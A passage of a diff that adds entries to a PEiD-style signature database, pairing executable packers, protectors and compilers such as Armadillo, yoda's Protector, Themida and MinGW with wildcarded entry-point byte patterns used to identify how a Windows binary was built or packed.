+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0
+ep_only = true
+
+[PeCompact v2.08 ->Bitsum Technologies]
+signature = B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D
+ep_only=true
+
+[Armadillo 3.01 - 3.50a -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 ?? 87 DB 7A F0 ?? ?? 61 50 51 EB 0F ?? EB 0F ?? EB 07 ?? EB 0F ?? EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC ?? 59 58 60 9C 33 C0 E8 09 00 00 00 E8 E8 23 00 00 00 7A 23 ?? 8B 04 24 EB 03 7A 29 ?? C6 00 90 C3 ?? 70 F0 87 D2 71 07 ?? ?? 40 8B DB 7A 11 EB 08 ?? EB F7 EB C3 ?? 7A E9 70 DA 7B D1 71 F3 ?? 7B F3 71 D6 ?? 9D 61 83 ED 06 33 FF 47 60 33 C9 75 02 EB 15 ?? 33 C9 75 18 7A 0C 70 0E EB 0D ?? 72 0E 79 F1 ?? ?? ?? 79 09 74 F0 EB 87 ?? 7A F0 ?? ?? 61 8B 9C BD B8 43
+ep_only = true
+
+[Microsoft (R) Incremental Linker Version 5.12.8078 (MASM/TASM)]
+signature= 6A 00 68 00 30 40 00 68 1E 30 40 00 6A 00 E8 0D 00 00 00 6A 00 E8 00 00 00 00 FF 25 00 20 40 00 FF 25 08 20 40
+ep_only = true
+
+[MinGW]
+signature = 55 89 E5 83 EC 08 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF FF
+ep_only = true
+
+[EXE Shield v0.x -> Smoke]
+signature= E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED BC 1A 40 00 EB 01 00 8D B5 46 1B 40 00 BA B3 0A 00 00 EB 01 00 8D 8D F9 25 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4 90
+ep_only = true
+
+[Thinstall v2.460 -> Jitit]
+signature= 55 8B EC 51 53 56 57 6A 00 6A 00 FF 15 F4 18 40 00 50 E8 87 FC FF FF 59 59 A1 94 1A 40 00 8B 40 10 03 05 90 1A 40 00 89 45 FC 8B 45 FC FF E0 5F 5E 5B C9 C3 00 00 00 76 0C 00 00 D4 0C 00 00 1E
+ep_only = true
+
+[yoda's Protector v1.01 -> Ashkbiz Danehkar]
+signature= 55 8B EC 53 56 57 E8 03 00 00 00 EB 01
+ep_only = true
+
+[yoda's Protector v1.0b -> Ashkbiz Danehkar]
+signature= 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 4C 32 40 00 E8 03 00 00 00 EB 01
+ep_only = true
+
+[yoda's Protector 1.02 -> Ashkibiz Danehlar]
+signature = E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2E E8 03 00 00 00 EB 01 ?? C3 60 E8 00 00 00 00 5D 81 ED 23 3F 42 00 8B D5 81 C2 72 3F 42 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 E8 03 00 00 00 EB 01 ?? 33 DB B9 3A 66 42 00 81 E9 1D 40 42 00 8B D5 81 C2 1D 40 42 00 8D 3A 8B F7 33 C0 E8 03 00 00 00 EB 01 ?? E8 17 00 00 00 90 90 90 E9 C3 1F 00 00 33 C0 64 FF 30 64 89 20 43 CC C3 90 EB 01 ?? AC
+ep_only = True
+
+[yoda's Protector v1.02b-> Ashkbiz Danehkar]
+signature= E8 03 00 00 00 EB 01
+ep_only = true
+
+[yoda's Protector 1.03.1 -> Ashkibiz Danehlar]
+signature = E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2E E8 03 00 00 00 EB 01 ?? C3 60 E8 00 00 00 00 5D 81 ED 74 72 42 00 8B D5 81 C2 C3 72 42 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 E8 03 00 00 00 EB 01 ?? 33 DB B9 3F A9 42 00 81 E9 6E 73 42 00 8B D5 81 C2 6E 73 42 00 8D 3A 8B F7 33 C0 E8 03 00 00 00 EB 01 ?? E8 17 00 00 00 90 90 90 E9 98 2E 00 00 33 C0 64 FF 30 64 89 20 43 CC C3 90 EB 01 ?? AC
+ep_only = True
+
+[yoda's cryptor 1.3 -> Ashkbiz Danehkar]
+signature= 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 6C 28 40 00 B9 5D 34 40 00 81 E9 C6 28 40 00 8B D5 81 C2 C6 28 40 00 8D 3A 8B F7 33 C0 EB 04 90 EB 01 C2 AC
+ep_only = true
+
+[ExeStealth -> WebToolMaster]
+signature= EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F
+ep_only = true
+
+[ARM Protector v0.2-> SMoKE]
+signature= E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 09 20 40 00 EB 02 83 09 8D B5 9A 20 40 00 EB 02 83 09 BA 0B 12 00 00 EB 01 00 8D 8D A5 32 40 00
+ep_only = true
+
+[MEW 10 packer v1.0 -> Northfox]
+signature= 33 C0 E9 ?? ?0
+ep_only = true
+
+[MEW 11 SE v1.0 -> Northfox]
+signature= E9 ?? ?? ?? ?? 00 00 00 02 00 00 00 0C ?0
+ep_only = true
+
+[MEW 11 SE v1.1 -> Northfox]
+signature= E9 ?? ?? ?? ?? 0C ?? ?? ?? 00 00 00 00 00 00 00 00
+ep_only = true
+
+[LamCrypt v1.0 -> LaZaRuS]
+signature= 60 66 9C BB 00 ?? ?? 00 80 B3 00 10 40 00 90 4B 83 FB FF 75 F3 66 9D 61 B8
+ep_only = true
+
+[ACProtect 1.09g -> Risco software Inc.]
+signature = 60 F9 50 E8 01 00 00 00 7C 58 58 49 50 E8 01 00 00 00 7E 58 58 79 04 66 B9 B8 72 E8 01 00 00 00 7A 83 C4 04 85 C8 EB 01 EB C1 F8 BE 72 03 73 01 74 0F 81 01 00 00 00 F9 EB 01 75 F9 E8 01 00 00
+ep_only = true
+
+[UPXcrypter -> archphase/NWC]
+signature = BF ?? ?? ?? 00 81 FF ?? ?? ?? 00 74 10 81 2F ?? 00 00 00 83 C7 04 BB 05 ?? ?? 00 FF E3 BE ?? ?? ?? 00 FF E6 00 00 00 00
+ep_only = true
+
+[ACProtect v1.90g -> Risco software Inc.]
+signature = 60 0F 87 02 00 00 00 1B F8 E8 01 00 00 00 73 83 04 24 06 C3
+ep_only = true
+
+[MEW 5 1.0 -> Northfox]
+signature = BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0
+ep_only = true
+
+[ROD High TECH -> Ayman]
+signature = 60 8B 15 1D 13 40 00 F7 E0 8D 82 83 19 00 00 E8 58 0C 00 00
+ep_only = true
+
+[Alex Protector v1.0 -> Alex]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 10 40 00 E8 24 00 00 00 EB 01 E9 8B
+ep_only = true
+
+[Unknown Packer -> Northfox]
+signature = 54 59 68 61 7A 79
+ep_only = true
+
+[hying's PE-Armor -> hying[CCG]]
+signature = E8 AA 00 00 00 2D ?? ?? ?? 00 00 00 00 00 00 00 00 3D
+ep_only= true
+
+[PE-Armor 0.46 -> China Cracking Group]
+signature = E8 AA 00 00 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 3D ?? ?? 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B ?? ?? 00 5C ?? ?? 00 6F ?? ?? 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 A2 01 00 00 ?? ?? 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 00 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 5D 81 ED 05 00 00 00 8D 75 3D 56 FF 55 31 8D B5 86 00 00 00 56 50 FF 55 2D 89 85 93 00 00 00 6A 04 68 00 10 00 00 FF B5 82 00 00 00 6A 00 FF 95 93 00 00 00 50 8B 9D 7E 00 00 00 03 DD 50 53 E8 04 00 00 00 5A 55 FF E2 60 8B 74 24 24 8B 7C 24 28 FC
+ep_only = True
+
+[Microsoft Visual C++ v7.0]
+signature = 6A 0C 68 88 BF 01 10 E8 B8 1C 00 00 33 C0 40 89 45 E4 8B 75 0C 33 FF 3B F7 75 0C 39 3D 6C 1E 12 10 0F 84 B3 00 00 00 89 7D FC 3B F0 74 05 83 FE 02 75 31 A1 98 36 12 10 3B C7 74 0C FF 75 10 56
+ep_only = true
+
+[North Star PE Shrinker 1.3 -> Liuxingping]
+signature = 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5
+ep_only = true
+
+[WebCops [EXE] -> LINK Data Security]
+signature = EB 03 05 EB 02 EB FC 55 EB 03 EB 04 05 EB FB EB 53 E8 04 00 00 00 72
+ep_only = true
+
+[WebCops [DLL] -> LINK Data Security]
+signature = A8 BE 58 DC D6 CC C4 63 4A 0F E0 02 BB CE F3 5C 50 23 FB 62 E7 3D 2B
+ep_only = true
+
+[REALbasic]
+signature = 55 89 E5 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 50 ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[PowerBASIC/CC 3.0x]
+signature = 55 8B EC 53 56 57 BB 00 ?? ?? 00 66 2E F7 05 ?? ?? ?? 00 04 00 0F 85
+ep_only = true
+
+[PowerBASIC/Win 7.0x]
+signature = 55 8B EC 53 56 57 BB 00 ?? 40 00 66 2E F7 05 ?? ?? 40 00 04 00 0F 85 DB 00 00 00
+ep_only = true
+
+[PE Ninja v1.0 -> +DzA kRAker TNT]
+signature = BE 5B 2A 40 00 BF 35 12 00 00 E8 40 12 00 00 3D 22 83 A3 C6 0F 85 67 0F 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
+ep_only = true
+
+
+[EXE Shield v0.1b - v0.3b, v0.3 -> SMoKE]
+signature = E8 04 00 00 00 83 60 EB 0C 5D EB 05
+ep_only = true
+
+[Themida -> Oreans Technologies 2004]
+signature = B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8
+ep_only = true
+
+[Packanoid -> Arkanoid]
+signature = BF 00 10 40 00 BE ?? ?? ?? 00 E8 9D 00 00 00 B8
+ep_only = true
+
+[Packanoid 1.0 -> ackanoid]
+signature = BF 00 ?? 40 00 BE ?? ?? ?? 00 E8 9D 00 00 00 B8 ?? ?? ?? 00 8B 30 8B 78 04 BB ?? ?? ?? 00 8B 43 04 91 E3 1F 51 FF D6 56 96 8B 13 8B 02 91 E3 0D 52 51 56 FF D7 5A 89 02 83 C2 04 EB EE 83 C3 08 5E EB DB B9 ?? ?? 00 00 BE 00 ?? ?? 00 EB 01 00 BF ?? ?? ?? 00 EB 21 00 ?? ?? 00 00 ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 C0 00 F3 A4 E9 ?? ?? ?? 00 00 ?? ?? 00 00 ?? ?? 00 ?? ?? ?? 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 C0 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2C
+ep_only = True
+
+[Alloy 4.x -> PGWare LLC]
+signature = 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 30 40 00 87 DD 6A 04 68 00 10 00 00 68 00 02 00 00 6A 00 FF 95 A8 33 40 00 0B C0 0F 84 F6 01 00 00 89 85 2E 33 40 00 83 BD E8 32 40 00 01 74 0D 83 BD E4 32 40 00 01 74 2A 8B F8 EB 3E 68 D8 01 00 00 50 FF 95 CC 33 40 00 50 8D 85 28 33 40 00 50 FF B5 2E 33 40 00 FF 95 D0 33 40 00 58 83 C0 05 EB 0C 68 D8 01 00 00 50 FF 95 C0 33 40 00 8B BD 2E 33 40 00 03 F8 C6 07 5C 47 8D B5 00 33 40 00 AC 0A C0 74 03 AA EB F8 83 BD DC 32 40 00 01 74 7A 6A 00 68 80 00 00 00 6A 03 6A 00 6A 00 68 00 00 00 80 FF B5 2E 33 40 00 FF 95 B4 33 40 00 83 F8 FF 74 57 89 85 32 33 40 00 8D 85 56 33 40 00 8D 9D 5E 33 40 00 8D 8D 66 33 40 00 51 53 50 FF B5 32 33 40 00 FF 95 C4 33 40 00 FF B5 32 33 40 00 FF 95 B8 33 40 00 8B 85
+ep_only = True
+
+[SoftDefender 1.x -> Randy Li]
+signature = 74 07 75 05 19 32 67 E8 E8 74 1F 75 1D E8 68 39 44 CD 00 59 9C 50 74 0A 75 08 E8 59 C2 04 00 55 8B EC E8 F4 FF FF FF 56 57 53 78 0F 79 0D E8 34 99 47 49 34 33 EF 31 34 52 47 23 68 A2 AF 47 01 59 E8 01 00 00 00 FF 58 05 E6 01 00 00 03 C8 74 BD 75 BB E8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = True
+
+[SDProtector 1.x -> Randy Li]
+signature = 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 53 00 00 00 51 8B 4C 24 10 89 81 B8 00 00 00 B8 55 01 00 00 89 41 20 33 C0 89 41 04 89 41 08 89 41 0C 89 41 10 59 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 33 C0 64 FF 30 64 89 20 9C 80 4C 24 01 01 9D 90 90 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 64 8F 00 58 74 07 75 05 19 32 67 E8 E8 74 27 75 25 EB 00 EB FC 68 39 44 CD 00 59 9C 50 74 0F 75 0D E8 59 C2 04 00 55 8B EC E9 FA FF FF 0E E8 EF FF FF FF 56 57 53 78 03 79 01 E8 68 A2 AF 47 01 59 E8 01 00 00 00 FF 58 05 7B 03 00 00 03 C8 74 C4 75 C2 E8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = True
+
+[ExeJoiner 1.0 -> Yoda f2f]
+signature = 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 00 C6 00 5C 68 04 01 00 00 68 04 11 40 00 6A 00 E8 1A 03 00 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 68 04 11 40 00 E8 EC 02 00 00 83 F8 FF 0F 84 83 02 00 00 A3 08 12 40 00 6A 00 50 E8 E2 02 00 00 83 F8 FF 0F 84 6D 02 00 00 A3 0C 12 40 00 8B D8 83 EB 04 6A 00 6A 00 53 FF 35 08 12 40 00 E8 E3 02 00 00 6A 00 68 3C 12 40 00 6A 04 68 1E 12 40 00 FF 35 08 12 40 00 E8 C4 02 00 00 83 EB 04 6A 00 6A 00 53 FF 35 08 12 40 00 E8 B7 02 00 00 6A 00 68 3C 12 40 00 6A 04 68 1A 12 40 00 FF 35 08 12 40 00 E8 98 02 00 00 83 EB 04 6A 00 6A 00 53 FF 35 08 12 40 00 E8 8B 02 00 00 6A 00 68 3C 12 40 00 6A 04 68 34 12 40 00 FF 35 08 12 40 00 E8 6C 02 00 00 83 EB 04 6A 00 6A 00 53 FF 35 08 12 40 00 E8 5F 02 00 00
+ep_only = True
+
+[EmbedPE 1.13 -> cyclotron]
+signature = 83 EC 50 60 68 5D B9 52 5A E8 2F 99 00 00 DC 99 F3 57 05 68 B8 5E 2D C6 DA FD 48 63 05 3C 71 B8 5E 97 7C 36 7E 32 7C 08 4F 06 51 64 10 A3 F1 4E CF 25 CB 80 D2 99 54 46 ED E1 D3 46 86 2D 10 68 93 83 5C 46 4D 43 9B 8C D6 7C BB 99 69 97 71 2A 2F A3 38 6B 33 A3 F5 0B 85 97 7C BA 1D 96 DD 07 F8 FD D2 3A 98 83 CC 46 99 9D DF 6F 89 92 54 46 9F 94 43 CC 41 43 9B 8C 61 B9 D8 6F 96 3B D1 07 32 24 DD 07 05 8E CB 6F A1 07 5C 62 20 E0 DB BA 9D 83 54 46 E6 83 51 7A 2B 94 54 64 8A 83 05 68 D7 5E 2D C6 B7 57 00 B3 E8 3C 71 B8 3C 97 7C 36 19 32 7C 08 2A 06 51 64 73 A3 F1 4E 92 25 CB 80 8D 99 54 46 B0 E1 D3 46 A5 2D 10 68 B6 83 91 46 F2 DF 64 FD D1 BC CA AA 70 E2 AB 39 AE 3B 5A 6F 9B 15 BD 25 98 25 30 4C AD 7D 55 07 A8 A3 AC 0A C1 BD 54 72 BC 83 54 82 A3 97 B1 1A B3 83 54 46 83
+ep_only = True
+
+[Dual's eXe 1.0]
+signature = 55 8B EC 81 EC 00 05 00 00 E8 00 00 00 00 5D 81 ED 0E 00 00 00 8D 85 08 03 00 00 89 28 33 FF 8D 85 7D 02 00 00 8D 8D 08 03 00 00 2B C8 8B 9D 58 03 00 00 E8 1C 02 00 00 8D 9D 61 02 00 00 8D B5 7C 02 00 00 46 80 3E 00 74 24 56 FF 95 0A 04 00 00 46 80 3E 00 75 FA 46 80 3E 00 74 E7 50 56 50 FF 95 0E 04 00 00 89 03 58 83 C3 04 EB E3 8D 85 24 03 00 00 50 68 1F 00 02 00 6A 00 8D 85 48 03 00 00 50 68 01 00 00 80 FF 95 69 02 00 00 83 BD 24 03 00 00 00 0F 84 8B 00 00 00 C7 85 28 03 00 00 04 00 00 00 8D 85 28 03 00 00 50 8D 85 20 03 00 00 50 8D 85 6C 03 00 00 50 6A 00 8D 85 62 03 00 00 50 FF B5 24 03 00 00 FF 95 71 02 00 00 83 BD 20 03 00 00 01 7E 02 EB 20 6A 40 8D 85 73 03 00 00 50 8D 85 82 03 00 00 50 6A 00 FF 95 61 02 00 00 6A 00 FF 95 65 02 00 00 FF 8D 20 03 00 00 FF
+ep_only = True
+
+[Crunch v5 -> Bit-Arts]
+signature = EB 15 03 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 68 00 00 00 00 55 E8 00 00 00 00 5D 81 ED 1D 00 00 00 8B C5 55 60 9C 2B 85 FC 07 00 00 89 85 E8 07 00 00 FF 74 24 2C E8 20 02 00 00 0F 82 94 06 00 00 E8 F3 04 00 00 49 0F 88 88 06 00 00 8B B5 E8 07 00 00 8B 56 3C 8D 8C 32 C8 00 00 00 83 39 00 74 50 8B D9 53 68 BB D4 C3 79 33 C0 50 E8 0E 04 00 00 50 8D 95 EC 07 00 00 52 6A 04 68 00 10 00 00 FF B5 E8 07 00 00 FF D0 58 5B C7 03 00 00 00 00 C7 43 04 00 00 00 00 8D 95 F0 07 00 00 52 FF B5 EC 07 00 00 68 00 10 00 00 FF B5 E8 07 00 00 FF D0 68 6C D9 B2 96 33 C0 50 E8 C1 03 00 00 89 85 ?? 46 00 00 68 EC 49 7B 79 33 C0 50 E8 AE 03 00 00 89 85 ?? 46 00 00 E8 04 06 00 00 E9 F3 05 00 00 51 52 53 33 C9 49 8B D1 33 C0 33 DB AC 32 C1 8A CD 8A EA 8A D6 B6 08 66 D1 EB 66 D1
+ep_only = True
+
+[Goat's PE Mutilator 1.6]
+signature = E8 EA 0B 00 00 ?? ?? ?? 8B 1C 79 F6 63 D8 8D 22 B0 BF F6 49 08 C3 02 BD 3B 6C 29 46 13 28 5D 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0F 53 0F DE 0F 55 0F 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = True
+
+[Vcasm-Protector 1.0]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? 00 68 ?? ?? ?? 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 07 00 00 00 C7 83 83 C0 13 EB 0B 58 EB 02 CD 20 83 C0 02 EB 01 E9 50 C3 E8 B9 04 00 00 00 E8 1F 00 00 00 EB FA E8 16 00 00 00 E9 EB F8 00 00 58 EB 09 0F 25 E8 F2 FF FF FF 0F B9 49 75 F1 EB 05 EB F9 EB F0 D6 EB 01 0F 31 F0 EB 0C 33 C8 EB 03 EB 09 0F 59 74 05 75 F8 51 EB F1 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 05 00 00 00 0F 01 EB 05 E8 EB FB 00 00 83 C4 04 B9 04 00 00 00 E8 1F 00 00 00 EB FA E8 16 00 00 00 E9 EB F8 00 00 58 EB 09 0F 25 E8 F2 FF FF FF 0F B9
+ep_only = True
+
+[ExeShield 3.6 -> www.exeshield.com]
+signature = B8 ?? ?? ?? 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 CE 1E 42 AF F8 D6 CC E9 FB C8 4F 1B 22 7C B4 C8 0D BD 71 A9 C8 1F 5F B1 29 8F 11 73 8F 00 D1 88 87 A9 3F 4D 00 6C 3C BF C0 80 F7 AD 35 23 EB 84 82 6F 8C B9 0A FC EC E4 82 97 AE 0F 18 D2 47 1B 65 EA 46 A5 FD 3E 9D 75 2A 62 80 60 F9 B0 0D E1 AC 12 0E 9D 24 D5 43 CE 9A D6 18 BF 22 DA 1F 72 76 B0 98 5B C2 64 BC AE D8
+ep_only = True
+
+[PocketPC SHA]
+signature = 86 2F 96 2F A6 2F B6 2F 22 4F 43 68 53 6B 63 6A 73 69 F0 7F 0B D0 0B 40 09 00 09 D0 B3 65 A3 66 93 67 0B 40 83 64 03 64 04 D0 0B 40 09 00 10 7F 26 4F F6 6B F6 6A F6 69 0B 00 F6 68 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 22 4F F0 7F 0A D0 06 D4 06 D5 0B 40 09 00 08 D0 05 D4 06 D5 0B 40 09 00 10 7F 26 4F 0B 00 09 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 7F ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = True
+
+[PocketPC MIB]
+signature = E8 FF BD 27 14 00 BF AF 18 00 A4 AF 1C 00 A5 AF 20 00 A6 AF 24 00 A7 AF ?? ?? ?? 0C 00 00 00 00 18 00 A4 8F 1C 00 A5 8F 20 00 A6 8F ?? ?? ?? 0C 24 00 A7 8F ?? ?? ?? 0C 25 20 40 00 14 00 BF 8F 08 00 E0 03 18 00 BD 27 ?? FF BD 27 18 00 ?? AF ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 01 3C ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 8C ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = True
+
+[PocketPC ARM]
